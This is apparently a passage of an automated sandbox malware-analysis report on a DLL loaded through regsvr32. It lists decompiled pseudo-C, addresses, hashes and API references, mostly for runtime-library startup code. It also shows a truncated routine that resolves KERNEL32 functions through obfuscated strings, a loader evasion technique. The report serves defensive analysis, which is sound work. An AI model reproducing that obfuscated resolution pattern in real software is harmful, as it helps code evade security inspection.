				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E6E9EF8D2(_t48);
						E6E9EF319(_t48, _t57, 0, 0x6e9fd430, 0, 0x6e9fd430, 0x104);
						_t26 =  *0x6e9fd9d0; // 0x2aa32f0
						 *0x6e9fd9c0 = 0x6e9fd430;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6e9fd430;
							_v20 = 0x6e9fd430;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6E9ECC22(E6E9ECAAE( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6E9ECAAE( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6E9EF20C(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6e9fd9c4 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6e9fd9c8 = _t58;
											L18:
											E6E9EDC0E(_t37);
											_v12 = 0;
											L19:
											E6E9EDC0E(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6e9fd9c4 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6e9fd9c8 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6E9ED46D(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6E9ED46D(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6E9EC24F();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x6e9ec978
0x6e9ec981
0x6e9ec986
0x6e9ec990
0x6e9ec993
0x6e9ec9b0
0x6e9ec9b1
0x6e9ec9c4
0x6e9ec9c9
0x6e9ec9d1
0x6e9ec9d7
0x6e9ec9da
0x6e9ec9dc
0x6e9ec9e3
0x6e9ec9e3
0x6e9ec9e5
0x6e9ec9e8
0x6e9ec9eb
0x6e9ec9f2
0x6e9eca0b
0x6e9eca10
0x6e9eca12
0x6e9eca33
0x6e9eca3b
0x6e9eca3e
0x6e9eca59
0x6e9eca5c
0x6e9eca63
0x6e9eca67
0x6e9eca69
0x6e9eca70
0x6e9eca73
0x6e9eca75
0x6e9eca77
0x6e9eca79
0x6e9eca83
0x6e9eca83
0x6e9eca85
0x6e9eca8b
0x6e9eca8e
0x6e9eca90
0x6e9eca96
0x6e9eca97
0x6e9eca9d
0x6e9ecaa0
0x6e9ecaa1
0x6e9ecaa7
0x6e9ecaaa
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eca7b
0x6e9eca7b
0x6e9eca7b
0x6e9eca7e
0x6e9eca7f
0x6e9eca7f
0x00000000
0x6e9eca7b
0x6e9eca6b
0x00000000
0x6e9eca6b
0x6e9eca43
0x6e9eca43
0x6e9eca44
0x6e9eca49
0x6e9eca4b
0x6e9eca4d
0x6e9eca52
0x6e9eca52
0x00000000
0x6e9eca52
0x6e9eca14
0x6e9eca19
0x6e9eca1b
0x6e9eca1c
0x00000000
0x6e9eca1c
0x6e9ec9de
0x6e9ec9e1
0x00000000
0x00000000
0x00000000
0x6e9ec9e1
0x6e9ec995
0x6e9ec998
0x00000000
0x00000000
0x6e9ec99a
0x6e9ec9a1
0x6e9ec9a2
0x6e9ec9a4
0x6e9ec9a9
0x00000000
0x6e9ec9a9
0x00000000

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6E9EC9BB, 6E9EC9F8

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: 79acb4d56d19fb7497013acec7a64a86d82bd528d688edec89248fe3c3197f6f
Instruction ID: 90e943c568e6010200ce4c43b3bcecc79db5cea057d7c23737b39c52776a0d0e
Opcode Fuzzy Hash: 79acb4d56d19fb7497013acec7a64a86d82bd528d688edec89248fe3c3197f6f
Instruction Fuzzy Hash: 554198B1A05255BFCB12CBE9D880A9EBBBCEFD6304F100466E651AB740E770DA408F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EB475 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E6E9EB475(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6E9EAD86(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6E9EAD86(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6E9EA645(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6E9EA578(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6E9EB04B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6E9ED547(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6e9eb475
0x6e9eb475
0x6e9eb47c
0x6e9eb485
0x6e9eb5a4
0x6e9eb48b
0x6e9eb48b
0x6e9eb48c
0x6e9eb48d
0x6e9eb497
0x6e9eb49a
0x6e9eb4a0
0x6e9eb4aa
0x6e9eb4cf
0x6e9eb4d4
0x6e9eb4d9
0x6e9eb5a0
0x00000000
0x6e9eb5a1
0x6e9eb4d9
0x6e9eb4aa
0x6e9eb4df
0x6e9eb4e2
0x6e9eb4e5
0x6e9eb4eb
0x6e9eb4f1
0x6e9eb503
0x6e9eb508
0x6e9eb50b
0x6e9eb50e
0x6e9eb511
0x6e9eb514
0x6e9eb51a
0x6e9eb520
0x6e9eb523
0x6e9eb526
0x6e9eb535
0x6e9eb536
0x6e9eb536
0x6e9eb53b
0x6e9eb54e
0x6e9eb550
0x6e9eb555
0x6e9eb560
0x6e9eb562
0x6e9eb564
0x6e9eb580
0x6e9eb585
0x6e9eb588
0x6e9eb588
0x6e9eb560
0x6e9eb555
0x6e9eb58e
0x6e9eb58f
0x6e9eb592
0x6e9eb595
0x6e9eb598
0x6e9eb59b
0x6e9eb526
0x00000000
0x6e9eb51a
0x6e9eb5a5
0x6e9eb5aa
0x6e9eb5ae
0x6e9eb5b1
0x6e9eb5b2
0x6e9eb5b3
0x6e9eb5b4
0x6e9eb5b9
0x6e9eb631
0x6e9eb633
0x6e9eb5bb
0x6e9eb5bb
0x6e9eb5c1
0x00000000
0x6e9eb5c3
0x6e9eb5c6
0x6e9eb5c9
0x6e9eb5d0
0x6e9eb5d3
0x6e9eb5d7
0x6e9eb609
0x6e9eb60c
0x6e9eb613
0x6e9eb619
0x6e9eb623
0x6e9eb62c
0x6e9eb62c
0x6e9eb623
0x6e9eb619
0x6e9eb62d
0x6e9eb5d9
0x6e9eb5d9
0x6e9eb5d9
0x6e9eb5dc
0x6e9eb5dc
0x6e9eb5e0
0x00000000
0x00000000
0x6e9eb5e4
0x6e9eb5f8
0x6e9eb5f8
0x6e9eb5e6
0x6e9eb5e6
0x6e9eb5ec
0x00000000
0x6e9eb5ee
0x6e9eb5ee
0x6e9eb5f1
0x6e9eb5f6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb5f6
0x6e9eb5ec
0x6e9eb601
0x6e9eb603
0x00000000
0x6e9eb605
0x6e9eb605
0x6e9eb605
0x00000000
0x6e9eb603
0x6e9eb5fc
0x6e9eb5fe
0x00000000
0x6e9eb5fe
0x00000000
0x00000000
0x00000000
0x6e9eb5c9
0x6e9eb5c1
0x6e9eb634
0x6e9eb638
0x6e9eb638

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E9EB49A

Strings

MOC, xrefs: 6E9EB4AC
RCC, xrefs: 6E9EB4B4

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 943868e12fb7abce60ad4fc6c884de2aef6cb2074370a782f7010bd98ba7011b
Instruction ID: a800fabcc5f9de88481d01bcb026544365ab169e725fa02f203a4ff5538e5590
Opcode Fuzzy Hash: 943868e12fb7abce60ad4fc6c884de2aef6cb2074370a782f7010bd98ba7011b
Instruction Fuzzy Hash: B741487290020AAFDF26CFD4C880AEE7BB9BF48304F148499FA15A6668E735D950DF51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 2016, Parent PID: 1264COMMON

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1661
Total number of Limit Nodes:	25

Executed Functions

Function 6F8493FD Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E6F8493FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6f85a5f0);
				E6F849960(__ebx, __edi, __esi);
				_t34 =  *0x6f85cfec; // 0x1
				if(_t34 > 0) {
					 *0x6f85cfec = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6F848E91();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6f85cfc8 - 2;
					if( *0x6f85cfc8 != 2) {
						E6F849839(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6f85a618);
						E6F849960(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6F8495B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6F8492A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_push(_t72);
									_push( *((intOrPtr*)(_t82 + 8)));
									_t42 = E6F849A40();
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_push(_t42);
											_push( *((intOrPtr*)(_t82 + 8)));
											_t45 = E6F849A40();
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6F8493FD(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6F8495B8( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6F8492A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6F8495B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6f85cfec - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6F848F5C(__ebx, _t61, 1, __esi);
						E6F849A52();
						E6F849AB3();
						 *0x6f85cfc8 =  *0x6f85cfc8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6F849492();
						_t54 = E6F8490FE( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6F84949F();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6f8493fd
0x6f8493fd
0x6f8493ff
0x6f849404
0x6f849409
0x6f849410
0x6f849417
0x6f84941f
0x6f849422
0x6f84942b
0x6f84942e
0x6f849431
0x6f849438
0x6f8494a7
0x6f8494ac
0x6f8494ad
0x6f8494af
0x6f8494b4
0x6f8494b9
0x6f8494bc
0x6f8494be
0x6f8494cf
0x6f8494cf
0x6f8494d3
0x6f8494d6
0x6f8494e2
0x6f8494e2
0x6f8494ef
0x6f8494f1
0x6f8494f4
0x6f8494f6
0x6f849501
0x6f849506
0x6f849508
0x6f84950b
0x6f84950d
0x00000000
0x00000000
0x6f84950d
0x6f8494d8
0x6f8494d8
0x6f8494db
0x00000000
0x6f8494dd
0x6f8494dd
0x6f849513
0x6f849513
0x6f849514
0x6f849515
0x6f849518
0x6f84951d
0x6f84951f
0x6f849522
0x6f849525
0x6f849527
0x6f849529
0x6f84952b
0x6f84952c
0x6f84952d
0x6f849530
0x6f849535
0x6f849537
0x6f849537
0x6f84953d
0x6f84953e
0x6f849543
0x6f849549
0x6f849549
0x6f849529
0x6f84954e
0x6f849550
0x6f849557
0x6f849561
0x6f849563
0x6f849566
0x6f849568
0x6f849574
0x6f84959c
0x6f84959c
0x6f849552
0x6f849552
0x6f849555
0x00000000
0x00000000
0x6f849555
0x6f849550
0x6f8494db
0x6f84959f
0x6f8495a6
0x6f8494c0
0x6f8494c0
0x6f8494c6
0x00000000
0x6f8494c8
0x6f8494c8
0x6f8494c8
0x6f8494c6
0x6f8495ab
0x6f8495b7
0x6f84943a
0x6f84943a
0x6f84943f
0x6f849444
0x6f849449
0x6f849450
0x6f849454
0x6f84945e
0x6f84946a
0x6f84946c
0x6f84946c
0x6f84946e
0x6f849471
0x6f849478
0x6f84947d
0x00000000
0x6f84947d
0x6f849412
0x6f849412
0x6f84947f
0x6f849482
0x6f84948e
0x6f84948e

APIs

__RTC_Initialize.LIBCMT ref: 6F849444
___scrt_uninitialize_crt.LIBCMT ref: 6F84945E

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 288f29c99419db7fbfdcfa619ccdc0ef732179540f988c53b456ad9c1aabaa84
Instruction ID: 12cbda8412b272cee9fd847af57efc965815bb6cc64a5d84e79ae71909de2c87
Opcode Fuzzy Hash: 288f29c99419db7fbfdcfa619ccdc0ef732179540f988c53b456ad9c1aabaa84
Instruction Fuzzy Hash: A641B172D0471CBBDB308F69CE40B9E7A78EB45768F1149DAE8246F288D7749D01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F8494AD Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E6F8494AD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6f85a618);
				E6F849960(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6F8495B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6F8492A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_push(_t42);
						_push( *((intOrPtr*)(_t47 + 8)));
						_t26 = E6F849A40();
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_push(_t26);
								_push( *((intOrPtr*)(_t47 + 8)));
								_t29 = E6F849A40();
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6F8493FD(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6F8495B8( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6F8492A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6F8495B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6f85cfec - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6f8494ad
0x6f8494ad
0x6f8494af
0x6f8494b4
0x6f8494b9
0x6f8494be
0x6f8494cf
0x6f8494cf
0x6f8494d3
0x6f8494d6
0x6f8494e2
0x6f8494e2
0x6f8494ef
0x6f8494f1
0x6f8494f4
0x6f8494f6
0x6f84959f
0x6f84959f
0x6f8495a6
0x6f8495a8
0x6f8495ab
0x6f8495b7
0x6f8495b7
0x6f849501
0x6f849506
0x6f849508
0x6f84950b
0x6f84950d
0x00000000
0x00000000
0x6f849513
0x6f849513
0x6f849514
0x6f849515
0x6f849518
0x6f84951d
0x6f84951f
0x6f849522
0x6f849525
0x6f849527
0x6f849529
0x6f84952b
0x6f84952c
0x6f84952d
0x6f849530
0x6f849535
0x6f849537
0x6f849537
0x6f84953d
0x6f84953e
0x6f849543
0x6f849549
0x6f849549
0x6f849529
0x6f84954e
0x6f849550
0x6f849557
0x6f849561
0x6f849563
0x6f849566
0x6f849568
0x6f849574
0x6f84959c
0x6f84959c
0x00000000
0x6f849552
0x6f849552
0x6f849555
0x00000000
0x00000000
0x00000000
0x6f849555
0x6f849550
0x6f8494d8
0x6f8494db
0x00000000
0x00000000
0x6f8494dd
0x00000000
0x6f8494dd
0x6f8494c0
0x6f8494c6
0x00000000
0x00000000
0x6f8494c8
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6F8494EA
dllmain_crt_dispatch.LIBCMT ref: 6F849501
dllmain_raw.LIBCMT ref: 6F849549
dllmain_crt_dispatch.LIBCMT ref: 6F84955C
dllmain_raw.LIBCMT ref: 6F84956F

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 5fe9c07127f5f08f9aeaca650adedbe1d1914745b37b83f29c844dccc8af9e35
Instruction ID: bc0f1c8479736eb067a985d7b15f5a0c24a0bdcc29ea8554c4ee24b61f753542
Opcode Fuzzy Hash: 5fe9c07127f5f08f9aeaca650adedbe1d1914745b37b83f29c844dccc8af9e35
Instruction Fuzzy Hash: 11219471D0072DBFDB318E68CE40AAF3A69EB85BA4F124995F8245F258C3309D418BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F845D90 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 193
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E6F845D90(void* __eflags) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				CHAR* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _t86;

				_v5 = 0;
				_t86 = E6F842640(L"KERNEL32.dll", 0); // executed
				_v24 = _t86;
				_v20 = E6F843C50(E6F844F10( &_v5));
				_v28 = _v24(_v20);
				if(_v28 == 0) {
					_v6 = 0;
					_v36 = E6F842430(L"KERNEL32.dll", 0);
					_v32 = E6F843BF0(E6F843DF0( &_v6));
					_v36(_v32);
				}
				_v7 = 0;
				_v44 = E6F842640(L"KERNEL32.dll", 0);
				_v40 = E6F843C90(E6F844120( &_v7));
				_v48 = _v44(_v40);
				if(_v48 == 0) {
					_v8 = 0;
					_v56 = E6F842430(L"KERNEL32.dll", 0);
					_v52 = E6F843CD0(E6F845090( &_v8));
					_v56(_v52);
				}
				_v9 = 0;
				_v64 = E6F842640(L"KERNEL32.dll", 0);
				_v60 = E6F843B10(E6F844E00( &_v9));
				_v68 = _v64(_v60);
				if(_v68 == 0) {
